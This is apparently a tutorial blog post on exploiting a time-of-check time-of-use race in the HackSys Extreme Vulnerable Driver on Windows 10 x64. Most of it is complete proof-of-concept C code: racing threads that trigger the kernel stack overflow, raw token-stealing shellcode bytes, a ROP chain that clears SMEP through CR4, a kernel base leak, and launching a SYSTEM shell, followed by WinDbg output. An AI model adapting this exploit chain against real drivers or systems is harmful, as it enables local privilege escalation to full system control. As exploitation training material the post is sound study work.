Windows 10 x64 Kernel Exploitation - Time-of-Check Time-of-Use (TOCTOU) Race Condition using HEVD

Looking at the Vulnerability

If we look at the TriggerDoubleFetch function within the HEVD driver with Binary Ninja, we can see it's a stack buffer overflow like the one in the first blog post, except this time a check has been added to ensure the size of the buffer passed from userland is <= 0x800.

Disassembly in pseudo C

However, between the time-of-check (TOC) and time-of-use (TOU), the UserDoubleFetch->Size value could change, which makes the code vulnerable to a TOCTOU race condition.

Triggering the TOCTOU Race

I thought this would be difficult since the TOCTOU window is only a couple of assembly instructions, which execute within a few nanoseconds. But it turns out it's not too bad: you just need, at a minimum, two threads, one constantly calling DeviceIoControl with a small buffer size that passes the check, and one that keeps switching the buffer size to a bigger value. The example below uses 5 threads for each role, but I also got it working with NUM_THREADS set to 1.

Some people do fancy stuff like lock the threads to different CPU cores, or change process priority, but I didn't need this, and didn't want to since the code needs to run as a low privileged user and these APIs should require privileges like SeIncreaseBasePriorityPrivilege.

#include <Windows.h>
#include <stdio.h>
#include <string.h>

/* Short alias for unsigned long long; used below as the loop-counter type. */
typedef unsigned long long u64;

/*
 * Input structure passed to the driver with HEVD_IOCTL_DOUBLE_FETCH.
 * NOTE(review): the layout presumably mirrors the driver's own definition of
 * this structure - confirm against the HEVD source before changing it.
 */
typedef struct _DOUBLE_FETCH {
    PVOID  Buffer;  /* user-mode buffer handed to the driver */
    SIZE_T Size;    /* size value the driver reads; rewritten concurrently by the racing threads */
} DOUBLE_FETCH, *PDOUBLE_FETCH;

/*
 * Argument bundle shared by every thread started from main().
 * Note that pDoubleFetch is an embedded structure, not a pointer, despite its
 * "p" prefix; threads take its address when calling DeviceIoControl.
 */
typedef struct _IRP_ARGS {
    HANDLE        hHEVD;         /* handle to the HEVD device */
    DOUBLE_FETCH  pDoubleFetch;  /* request structure sent with each IOCTL */
} IRP_ARGS, *PIRP_ARGS;

/*
 * Number of elements in a true array (not a pointer). The argument is
 * parenthesized so that expression arguments such as a cast or dereference
 * expand correctly.
 */
#define ArraySize(x) (sizeof(x) / sizeof((x)[0]))

/* Build a METHOD_NEITHER, FILE_ANY_ACCESS control code for the given function number. */
#define IOCTL(Function) CTL_CODE(FILE_DEVICE_UNKNOWN, (Function), METHOD_NEITHER, FILE_ANY_ACCESS)
#define HEVD_IOCTL_DOUBLE_FETCH IOCTL(0x80D)

/* Number of threads started for EACH role (IOCTL caller and size changer). */
#define NUM_THREADS 5
/* Size in bytes of the user buffer, and the oversized value written into Size. */
#define BUFFER_SIZE 2500

/*
 * Worker thread: loops forever, resetting the shared Size field to 0x10 and
 * then sending the double-fetch IOCTL to the driver.
 *
 * lpParameters: pointer to the IRP_ARGS instance shared with the other threads.
 * Never returns in practice; main() terminates the thread.
 */
DWORD WINAPI DeviceIoControlThread(LPVOID lpParameters) {

    PIRP_ARGS     pArgs  = (PIRP_ARGS)lpParameters;
    DOUBLE_FETCH *pFetch = &pArgs->pDoubleFetch;

    for (;;) {
        DWORD cbReturned = 0;

        // Start every request from the small size; the other thread races to enlarge it.
        pFetch->Size = 0x10;

        DeviceIoControl(pArgs->hHEVD,
                        HEVD_IOCTL_DOUBLE_FETCH,
                        pFetch, sizeof(DOUBLE_FETCH),   // input buffer
                        NULL, 0x00,                     // no output buffer
                        &cbReturned,
                        NULL);

        Sleep(1);
    }

    return 0;
}

/*
 * Racing thread: loops forever, overwriting the shared Size field with
 * BUFFER_SIZE and then sleeping for 1 ms.
 *
 * lpParameters: pointer to the IRP_ARGS instance shared with the other threads.
 * Never returns in practice; main() terminates the thread.
 */
DWORD WINAPI SizeChaingingThread(LPVOID lpParameters) {

    PIRP_ARGS pArgs = (PIRP_ARGS)lpParameters;

    for (;;) {
        pArgs->pDoubleFetch.Size = BUFFER_SIZE;
        Sleep(1);
    }

    return 0;
}

/*
 * Race demo entry point: opens the HEVD device, fills a BUFFER_SIZE-byte
 * buffer with 'A', starts NUM_THREADS IOCTL threads and NUM_THREADS
 * size-changing threads sharing one IRP_ARGS, lets them run for 30 seconds,
 * then terminates them.
 *
 * Returns 0 on completion, 1 if the device cannot be opened or the buffer
 * cannot be allocated.
 */
int main(void) {

    HANDLE hHEVD = CreateFileA(
        "\\\\.\\HackSysExtremeVulnerableDriver",
        GENERIC_READ | GENERIC_WRITE,
        0,
        NULL,
        OPEN_EXISTING,
        FILE_ATTRIBUTE_NORMAL,
        NULL);

    // CreateFileA reports failure with INVALID_HANDLE_VALUE, not NULL, so a
    // plain "!hHEVD" test would let a failed open slip through.
    if (hHEVD == INVALID_HANDLE_VALUE) {
        printf("CreateFileA failed with error %lx\n", GetLastError());
        return 1;
    }

    PVOID buffer = VirtualAlloc(NULL, BUFFER_SIZE, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (!buffer) {
        printf("VirtualAlloc failed with error %lx\n", GetLastError());
        CloseHandle(hHEVD);
        return 1;
    }

    memset(buffer, 'A', BUFFER_SIZE);

    // One argument block shared by every thread; Size is the field being raced on.
    IRP_ARGS pIRPArgs = {
        .hHEVD = hHEVD,
        .pDoubleFetch.Buffer = buffer,
        .pDoubleFetch.Size = 0,
    };

    HANDLE hThreadWork[NUM_THREADS] = { 0 };
    HANDLE hThreadRace[NUM_THREADS] = { 0 };

    for (u64 i = 0; i < NUM_THREADS; i++) {
        hThreadWork[i] = CreateThread(NULL, 0, DeviceIoControlThread, &pIRPArgs, 0, NULL);
        hThreadRace[i] = CreateThread(NULL, 0, SizeChaingingThread,   &pIRPArgs, 0, NULL);
    }

    // Let the threads race for 30 seconds.
    Sleep(30000);

    // Neither thread function ever returns on its own, so stop them forcibly.
    // A slot is NULL if the corresponding CreateThread call failed.
    for (u64 i = 0; i < NUM_THREADS; i++) {
        if (hThreadWork[i] != NULL) {
            TerminateThread(hThreadWork[i], 0);
            CloseHandle(hThreadWork[i]);
        }
        if (hThreadRace[i] != NULL) {
            TerminateThread(hThreadRace[i], 0);
            CloseHandle(hThreadRace[i]);
        }
    }

    return 0;
}

Disassembly in pseudo C

Getting RCE

This is exactly the same as the Stack Buffer Overflow post.

Disassembly in pseudo C

The full PoC:

#include <Windows.h>
#include <Psapi.h>

#include <stdio.h>
#include <string.h>

/*
 * Short integer aliases. The names imply 8/16/32/64-bit widths, which is
 * what these base types provide on the Windows x64 toolchain this PoC targets.
 */
typedef signed char i8;
typedef short       i16;
typedef int         i32;
typedef long long   i64;

typedef unsigned char      u8;
typedef unsigned short     u16;
typedef unsigned int       u32;
typedef unsigned long long u64;

/*
 * Input structure passed to the driver with HEVD_IOCTL_DOUBLE_FETCH.
 * NOTE(review): the layout presumably mirrors the driver's own definition of
 * this structure - confirm against the HEVD source before changing it.
 */
typedef struct _DOUBLE_FETCH {
    PVOID  Buffer;  /* user-mode buffer handed to the driver */
    SIZE_T Size;    /* size value the driver reads; rewritten concurrently by the racing threads */
} DOUBLE_FETCH, *PDOUBLE_FETCH;

/*
 * Argument bundle shared by every thread started from main().
 * Note that pDoubleFetch is an embedded structure, not a pointer, despite its
 * "p" prefix; threads take its address when calling DeviceIoControl.
 */
typedef struct _IRP_ARGS {
    HANDLE        hHEVD;         /* handle to the HEVD device */
    HANDLE        hEvent;        /* event set by the IOCTL thread on success; polled by the size-changing thread */
    DOUBLE_FETCH  pDoubleFetch;  /* request structure sent with each IOCTL */
} IRP_ARGS, *PIRP_ARGS;

/*
 * Number of elements in a true array (not a pointer). The argument is
 * parenthesized so that expression arguments such as a cast or dereference
 * expand correctly.
 */
#define ArraySize(x) (sizeof(x) / sizeof((x)[0]))

/* Build a METHOD_NEITHER, FILE_ANY_ACCESS control code for the given function number. */
#define IOCTL(Function) CTL_CODE(FILE_DEVICE_UNKNOWN, (Function), METHOD_NEITHER, FILE_ANY_ACCESS)
#define HEVD_IOCTL_DOUBLE_FETCH IOCTL(0x80D)

/* Number of threads started for EACH role (IOCTL caller and size changer). */
#define NUM_THREADS 1
/* Size in bytes of the user buffer, and the oversized value written into Size. */
#define BUFFER_SIZE 2500

/*
 * Reports whether the user name returned by GetUserNameA is exactly "SYSTEM".
 *
 * Returns TRUE on a match; FALSE otherwise, including when GetUserNameA
 * itself fails (in which case the buffer contents must not be trusted).
 */
BOOL IsSYSTEM(void) {
    char  cUsername[256] = { 0 };
    DWORD nameLen = sizeof(cUsername);

    // On failure the buffer is not guaranteed to hold a terminated string,
    // so bail out instead of comparing garbage.
    if (!GetUserNameA(cUsername, &nameLen)) {
        return FALSE;
    }

    return strcmp(cUsername, "SYSTEM") == 0;
}

/*
 * Worker thread: repeatedly resets the shared Size field to 0x10 and sends
 * the double-fetch IOCTL. After each call it checks IsSYSTEM(); once that
 * reports TRUE it signals hEvent and exits.
 *
 * lpParameters: pointer to the IRP_ARGS instance shared with the other threads.
 * Returns 0.
 */
DWORD WINAPI DeviceIoControlThread(LPVOID lpParameters) {

    PIRP_ARGS     pArgs  = (PIRP_ARGS)lpParameters;
    DOUBLE_FETCH *pFetch = &pArgs->pDoubleFetch;

    for (;;) {
        DWORD cbReturned = 0;

        // Start every request from the small size; the other thread races to enlarge it.
        pFetch->Size = 0x10;

        DeviceIoControl(pArgs->hHEVD,
                        HEVD_IOCTL_DOUBLE_FETCH,
                        pFetch, sizeof(DOUBLE_FETCH),   // input buffer
                        NULL, 0x00,                     // no output buffer
                        &cbReturned,
                        NULL);

        if (!IsSYSTEM()) {
            // Not there yet: back off briefly and try again.
            Sleep(1);
            continue;
        }

        printf("Overflow triggered\n");
        printf("DeviceIoControlThread thread exiting\n");
        SetEvent(pArgs->hEvent);   // wakes main() and stops the size-changing thread
        return 0;
    }

    return 0;
}

/*
 * Racing thread: until hEvent is signaled, keeps overwriting the shared Size
 * field with BUFFER_SIZE, sleeping 1 ms between writes.
 *
 * lpParameters: pointer to the IRP_ARGS instance shared with the other threads.
 * Returns 0 once the event has been observed.
 */
DWORD WINAPI SizeChaingingThread(LPVOID lpParameters) {

    PIRP_ARGS pArgs = (PIRP_ARGS)lpParameters;

    for (;;) {
        // Zero timeout: just poll the event state without blocking.
        if (WaitForSingleObject(pArgs->hEvent, 0) == WAIT_OBJECT_0) {
            break;
        }

        pArgs->pDoubleFetch.Size = BUFFER_SIZE;
        Sleep(1);
    }

    printf("SizeChaingingThread exiting\n");
    return 0;
}

/*
 * Returns the first load address reported by EnumDeviceDrivers, which the
 * caller treats as the kernel image base.
 * NOTE(review): relies on the first entry being the kernel image - confirm
 * on the target build.
 *
 * Returns 0 if the enumeration fails or yields no entries.
 */
u64 GetKernelBaseAddress(void) {
    LPVOID drivers[1024] = { 0 };
    DWORD  cbNeeded = 0;

    // Do not trust the array contents unless the call succeeded and reported
    // at least one entry.
    if (!EnumDeviceDrivers(drivers, sizeof(drivers), &cbNeeded) ||
        cbNeeded < sizeof(drivers[0])) {
        return 0;
    }

    return (u64)drivers[0];
}

/*
 * Full PoC entry point. In order: creates the completion event, opens the
 * HEVD device, stages the shellcode in locked executable memory, resolves
 * the kernel base, builds the buffer sent to the driver, starts the racing
 * threads, waits for the worker to signal the event, then launches cmd.exe
 * and waits for it to exit.
 *
 * Returns 0 on completion, 1 if any setup step fails.
 */
int main(void) {

    // Manual-reset event, initially non-signaled; set by DeviceIoControlThread.
    HANDLE hEvent = CreateEventA(NULL, TRUE, FALSE, NULL);
    if (!hEvent) return 1;

    // 1. Set up driver handle

    HANDLE hHEVD = CreateFileA(
        "\\\\.\\HackSysExtremeVulnerableDriver",
        GENERIC_READ | GENERIC_WRITE,
        0,
        NULL,
        OPEN_EXISTING,
        FILE_ATTRIBUTE_NORMAL,
        NULL);

    // CreateFileA reports failure with INVALID_HANDLE_VALUE, not NULL, so a
    // plain "!hHEVD" test would let a failed open slip through.
    if (hHEVD == INVALID_HANDLE_VALUE) {
        printf("CreateFileA failed with error %lx\n", GetLastError());
        return 1;
    }

    // 2. Set up shellcode

    unsigned char token_steal[] = {
      0x65, 0x48, 0x8b, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x80,
      0xb8, 0x00, 0x00, 0x00, 0x49, 0x89, 0xc0, 0x4d, 0x8b, 0x80, 0x48, 0x04,
      0x00, 0x00, 0x49, 0x81, 0xe8, 0x48, 0x04, 0x00, 0x00, 0x4d, 0x8b, 0x88,
      0x40, 0x04, 0x00, 0x00, 0x49, 0x83, 0xf9, 0x04, 0x75, 0xe5, 0x49, 0x8b,
      0x88, 0xb8, 0x04, 0x00, 0x00, 0x80, 0xe1, 0xf0, 0x48, 0x89, 0x88, 0xb8,
      0x04, 0x00, 0x00, 0x65, 0x48, 0x8b, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00,
      0x66, 0x8b, 0x88, 0xe4, 0x01, 0x00, 0x00, 0x66, 0xff, 0xc1, 0x66, 0x89,
      0x88, 0xe4, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x90, 0x90, 0x00, 0x00, 0x00,
      0x48, 0x8b, 0x8a, 0x68, 0x01, 0x00, 0x00, 0x4c, 0x8b, 0x9a, 0x78, 0x01,
      0x00, 0x00, 0x48, 0x8b, 0xa2, 0x80, 0x01, 0x00, 0x00, 0x48, 0x8b, 0xaa,
      0x58, 0x01, 0x00, 0x00, 0x31, 0xc0, 0xb8, 0x02, 0x00, 0x00, 0x00, 0x0f,
      0x01, 0xf8, 0x48, 0x0f, 0x07
    };

    LPVOID shellcode = VirtualAlloc(NULL, sizeof(token_steal), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (!shellcode) return 1;

    memcpy(shellcode, token_steal, sizeof(token_steal));

    BOOL bLockRet = VirtualLock(shellcode, sizeof(token_steal));
    if (!bLockRet) {
        printf("VirtualLock failed with error %lx\n", GetLastError());
        return 1;
    }

    // 3. Get Kernel Base

    u64 kernelBase = (u64)GetKernelBaseAddress();
    if (kernelBase == 0x00) return 1;

    // 4. Set up buffer to send

    PVOID buffer = VirtualAlloc(NULL, BUFFER_SIZE, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (!buffer) return 1;

    // Set up ROP chain

    const u64 POP_RCX     = kernelBase + 0x9b2952; // pop rcx; ret;
    const u64 MOV_CR4_RCX = kernelBase + 0x9aa31b; // mov cr4, rcx; ret;

    const u64 offset = 2072;
    u64* rop = (u64*)((u64)buffer + offset);

    u64 index = 0;
    *(rop + index++) = POP_RCX;
    *(rop + index++) = 0xb50ef8 ^ (1UL << 20);     // value loaded into rcx: 0xb50ef8 with bit 20 flipped
    *(rop + index++) = MOV_CR4_RCX;
    *(rop + index++) = (u64)shellcode;

    // Trigger the overflow

    // One argument block shared by every thread; Size is the field being raced on.
    IRP_ARGS pIRPArgs = {
        .hHEVD  = hHEVD,
        .hEvent = hEvent,
        .pDoubleFetch.Buffer = buffer,
        .pDoubleFetch.Size   = 0,
    };

    HANDLE hThreadWork[NUM_THREADS] = { 0 };
    HANDLE hThreadRace[NUM_THREADS] = { 0 };

    for (u64 i = 0; i < NUM_THREADS; i++) {
        hThreadWork[i] = CreateThread(NULL, 0, DeviceIoControlThread, &pIRPArgs, 0, NULL);
        hThreadRace[i] = CreateThread(NULL, 0, SizeChaingingThread,   &pIRPArgs, 0, NULL);

        // Without both threads nobody may ever set hEvent, and the INFINITE
        // wait below would hang forever.
        if (!hThreadWork[i] || !hThreadRace[i]) {
            printf("CreateThread failed with error %lx\n", GetLastError());
            return 1;
        }
    }

    printf("Waiting for the race to trigger...\n");
    WaitForSingleObject(hEvent, INFINITE);

    STARTUPINFOW        si = { .cb = sizeof(STARTUPINFOW) };
    PROCESS_INFORMATION pi = { 0 };

    if (CreateProcessW(L"C:\\Windows\\System32\\cmd.exe",
        NULL, NULL, NULL, FALSE, 0, NULL, NULL,
        &si, &pi))
    {
        WaitForSingleObject(pi.hProcess, INFINITE);
        CloseHandle(pi.hThread);
        CloseHandle(pi.hProcess);
    }

    return 0;
}

Exactly-Once Delivery

Compared to the original triggering of the TOCTOU buffer overflow, I wanted to trigger it exactly once. The first step was to run a single SizeChaingingThread thread and a single DeviceIoControlThread thread. This makes controlling everything with thread synchronization primitives easier.

Then I needed a way to determine if a call to DeviceIoControl had triggered the overflow. At first, I wanted to use the return value: I thought my shellcode could set eax to something like 2 (because a BOOL is really an int), but for whatever reason I never got the value stored in eax back as the return value of DeviceIoControl. Maybe some wrapper in NTDLL just changed it back to 1/0 to follow the specification. NOTE: I realized while writing this blog that I should have checked GetLastError. Oh well.

My second idea was then to check if I had a SYSTEM token. That actually requires a bunch of code (OpenProcessToken, GetTokenInformation, AllocateAndInitializeSid, etc), so it's easier to just call GetUserNameA and check for SYSTEM. And this worked fine in the PoC above.

My last idea was to actually write back into the UserDoubleFetch->Buffer from the shellcode, and then check the Buffer after every DeviceIoControl call. This is better because it saves calling GetUserNameA thousands of times. Let's implement this!

Pass-Back the Result

During TriggerDoubleFetch I took note of the UserDoubleFetch address (0x00000034e331f828) and UserDoubleFetch->Buffer address (0x000002194edf0000). Then once the exploit reached the shellcode, I needed to find one of these in the registers or on the stack. I managed to find the UserDoubleFetch stored on the stack in a couple locations.

2: kd> s -q rsp l10000 0x00000034e331f828
ffff818c`82c2fa10  00000034`e331f828 00000000`00000010
ffff818c`82c2fa80  00000034`e331f828 00007ffb`00000010
ffff818c`82c2fc10  00000034`e331f828 00000000`000000e0

Now we can find the offset from rsp.

2: kd> ? ffff818c`82c2fa10 - rsp
Evaluate expression: 744 = 00000000`000002e8

We have a pointer to the DOUBLE_FETCH struct. Let's dereference that to get the struct data.

2: kd> dq rsp+2e8
ffff818c`82c2fa10  00000034`e331f828 00000000`00000010

So 00000034`e331f828 holds the struct data. The first element is the Buffer, let's check.

2: kd> dq 00000034`e331f828
00000034`e331f828  00000219`4edf0000 00000000`000009c4
00000034`e331f838  00000000`00000000 00000000`00000010

So the Buffer should be at 00000219`4edf0000, let's have a look.

2: kd> dq 00000219`4edf0000
00000219`4edf0000  61413161`41306141 41346141`33614132
00000219`4edf0010  37614136`61413561 62413961`41386141
00000219`4edf0020  41326241`31624130 35624134`62413362
00000219`4edf0030  62413762`41366241 41306341`39624138
00000219`4edf0040  33634132`63413163 63413563`41346341

Yup that's our pattern, and 61413161`41306141 is offset 0.

So we can dereference rsp + 0x2e8 to get the DOUBLE_FETCH struct, then dereference that value to get the Buffer, and then dereference the Buffer to write something at offset 0.

In assembly that would be:

  mov rax, [rsp + 0x2e8]      ; Load the first pointer (poi(rsp + 0x2e8)) into rax
  mov rbx, [rax]              ; Dereference rax to get the second pointer (poi(poi(rsp + 0x2e8)))
  mov dword [rbx], 0xDEADBEEF ; Write 0xDEADBEEF to the address pointed to by rbx (poi(poi(rsp + 0x2e8)))

I added that assembly to the shellcode. Now the DeviceIoControlThread function can be updated to the below, and we can correctly determine if the DeviceIoControl call triggered an overflow and ran the shellcode by checking the value at pIRPArgs->pDoubleFetch.Buffer. Which imo is nicer than spamming GetUserNameA.

/*
 * Worker thread: repeatedly resets the shared Size field to 0x10 and sends
 * the double-fetch IOCTL. After each call it reads the first 32 bits of the
 * user buffer; once they equal 0xDEADBEEF it signals hEvent and exits.
 * This marker check replaces the earlier per-iteration IsSYSTEM() test.
 *
 * lpParameters: pointer to the IRP_ARGS instance shared with the other threads.
 * Returns 0.
 */
DWORD WINAPI DeviceIoControlThread(LPVOID lpParameters) {

    PIRP_ARGS     pArgs  = (PIRP_ARGS)lpParameters;
    DOUBLE_FETCH *pFetch = &pArgs->pDoubleFetch;

    for (;;) {
        DWORD cbReturned = 0;

        // Start every request from the small size; the other thread races to enlarge it.
        pFetch->Size = 0x10;

        DeviceIoControl(pArgs->hHEVD,
                        HEVD_IOCTL_DOUBLE_FETCH,
                        pFetch, sizeof(DOUBLE_FETCH),   // input buffer
                        NULL, 0x00,                     // no output buffer
                        &cbReturned,
                        NULL);

        // Marker written back at offset 0 of the buffer signals success.
        u32 marker = *(u32*)pFetch->Buffer;
        if (marker != (u32)0xDEADBEEF) {
            // Not there yet: back off briefly and try again.
            Sleep(1);
            continue;
        }

        printf("Overflow triggered\n");
        printf("DeviceIoControlThread thread exiting\n");
        SetEvent(pArgs->hEvent);   // wakes main() and stops the size-changing thread
        return 0;
    }

    return 0;
}